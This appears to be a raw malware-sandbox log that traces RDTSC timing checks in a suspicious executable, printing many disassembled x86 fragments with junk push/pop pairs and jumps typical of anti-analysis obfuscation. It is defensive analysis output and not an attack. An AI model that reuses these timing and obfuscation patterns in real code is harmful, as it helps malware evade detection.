Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E467F second address: 8E4699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FCBAD522AA6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4699 second address: 8E469D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E469D second address: 8E46B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AB4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4805 second address: 8E4822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBACB2D127h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EA8C2 second address: 8EA8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC367 second address: 8EC373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC373 second address: 8EC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC378 second address: 8EC3B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FCBACB2D124h 0x00000012 jno 00007FCBACB2D116h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBACB2D120h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8EC3B8 second address: 8EC3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80D2F7 second address: 80D2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2044B second address: 4F20450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20450 second address: 4F20456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20456 second address: 4F2045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2045A second address: 4F2045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F2045E second address: 4F204CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, 7527h 0x0000000f pushfd 0x00000010 jmp 00007FCBAD522AACh 0x00000015 jmp 00007FCBAD522AB5h 0x0000001a popfd 0x0000001b popad 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, 0E98871Eh 0x00000027 pushfd 0x00000028 jmp 00007FCBAD522AAFh 0x0000002d sub cx, F3CEh 0x00000032 jmp 00007FCBAD522AB9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F204CC second address: 4F204D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F204D2 second address: 4F204D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20509 second address: 4F20524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F20524 second address: 4F2052A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F405FD second address: 4F40635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov esi, edi 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCBACB2D11Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40635 second address: 4F4063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4063B second address: 4F4063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4063F second address: 4F4065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, 5B848465h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4065F second address: 4F40676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBACB2D11Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40676 second address: 4F406B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 jmp 00007FCBAD522AB3h 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406B2 second address: 4F406C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406C0 second address: 4F406D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 014F76E4h 0x00000008 movsx edi, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406D5 second address: 4F406D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406D9 second address: 4F406DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406DF second address: 4F406F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F406F2 second address: 4F4071E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ecx, 26688D47h 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCBAD522AB5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4071E second address: 4F40724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40724 second address: 4F40728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40728 second address: 4F4075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FCBACB2D11Fh 0x00000010 nop 0x00000011 pushad 0x00000012 jmp 00007FCBACB2D124h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4075B second address: 4F4077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBAD522AB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4077D second address: 4F407B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBACB2D11Eh 0x00000015 adc ah, 00000078h 0x00000018 jmp 00007FCBACB2D11Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F407DB second address: 4F407E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F407E1 second address: 4F407E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4086E second address: 4F4087D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F4087D second address: 4F408BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov ax, B593h 0x00000010 jmp 00007FCBACB2D128h 0x00000015 popad 0x00000016 pop esi 0x00000017 pushad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F408BF second address: 4F30199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 leave 0x0000000a pushad 0x0000000b mov si, di 0x0000000e pushfd 0x0000000f jmp 00007FCBAD522AADh 0x00000014 sub ecx, 5FE657B6h 0x0000001a jmp 00007FCBAD522AB1h 0x0000001f popfd 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 cmp eax, 00000000h 0x00000028 setne al 0x0000002b jmp 00007FCBAD522AA2h 0x0000002d xor ebx, ebx 0x0000002f test al, 01h 0x00000031 jne 00007FCBAD522AA7h 0x00000033 sub esp, 04h 0x00000036 mov dword ptr [esp], 0000000Dh 0x0000003d call 00007FCBB1E20207h 0x00000042 mov edi, edi 0x00000044 jmp 00007FCBAD522AB0h 0x00000049 xchg eax, ebp 0x0000004a pushad 0x0000004b mov di, ax 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FCBAD522AB0h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30199 second address: 4F3019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3019D second address: 4F301A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301A3 second address: 4F301B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301B4 second address: 4F301B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301B8 second address: 4F301EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FCBACB2D11Dh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FCBACB2D11Eh 0x00000015 sub esp, 2Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCBACB2D11Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301EF second address: 4F301FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F301FE second address: 4F30204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30204 second address: 4F30208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30208 second address: 4F3022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBACB2D128h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3022C second address: 4F30285 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, edi 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d jmp 00007FCBAD522AB9h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FCBAD522AAEh 0x00000018 push eax 0x00000019 jmp 00007FCBAD522AABh 0x0000001e xchg eax, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FCBAD522AB5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30285 second address: 4F30295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D11Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30295 second address: 4F30299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3030E second address: 4F30312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30312 second address: 4F30318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30318 second address: 4F30392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D120h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov dl, cl 0x0000000e popad 0x0000000f je 00007FCBACB2D2F8h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FCBACB2D122h 0x0000001c and ax, 4618h 0x00000021 jmp 00007FCBACB2D11Bh 0x00000026 popfd 0x00000027 jmp 00007FCBACB2D128h 0x0000002c popad 0x0000002d lea ecx, dword ptr [ebp-14h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FCBACB2D127h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30392 second address: 4F30398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30398 second address: 4F3039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3039C second address: 4F303A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30403 second address: 4F30407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30407 second address: 4F30418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30569 second address: 4F30598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBACB2D11Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30598 second address: 4F305CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBAD522AB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305CA second address: 4F305CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305CE second address: 4F305D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305D4 second address: 4F305DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305DA second address: 4F305DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F305DE second address: 4F3068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 call 00007FCBACB2D11Ah 0x00000015 push ecx 0x00000016 pop edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007FCBACB2D11Dh 0x0000001f nop 0x00000020 jmp 00007FCBACB2D11Eh 0x00000025 push eax 0x00000026 pushad 0x00000027 mov ecx, edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBACB2D123h 0x00000030 sub cl, 0000004Eh 0x00000033 jmp 00007FCBACB2D129h 0x00000038 popfd 0x00000039 mov eax, 660DAC57h 0x0000003e popad 0x0000003f popad 0x00000040 nop 0x00000041 jmp 00007FCBACB2D11Ah 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBACB2D127h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30059 second address: 4F3005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F3005E second address: 4F30064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30064 second address: 4F30068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30068 second address: 4F300B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBACB2D123h 0x00000015 jmp 00007FCBACB2D123h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300B6 second address: 4F300BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300BC second address: 4F300C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300C0 second address: 4F300C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F300C4 second address: 4F30131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e mov dh, ah 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007FCBACB2D11Ch 0x00000017 mov dword ptr [esp], ecx 0x0000001a jmp 00007FCBACB2D120h 0x0000001f mov dword ptr [ebp-04h], 55534552h 0x00000026 pushad 0x00000027 call 00007FCBACB2D11Eh 0x0000002c call 00007FCBACB2D122h 0x00000031 pop ecx 0x00000032 pop edi 0x00000033 call 00007FCBACB2D120h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A58 second address: 4F30A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A5C second address: 4F30A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A60 second address: 4F30A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A66 second address: 4F30AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FCBACB2D11Ch 0x00000013 adc ecx, 25FBFDB8h 0x00000019 jmp 00007FCBACB2D11Bh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30B93 second address: 4F30BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FCBAD522AB1h 0x0000000a sbb cx, 2096h 0x0000000f jmp 00007FCBAD522AB1h 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 cmp dword ptr [75AB459Ch], 05h 0x0000001e jmp 00007FCBAD522AAEh 0x00000023 je 00007FCC1E0408CEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30BE3 second address: 4F30BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30BE7 second address: 4F30BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
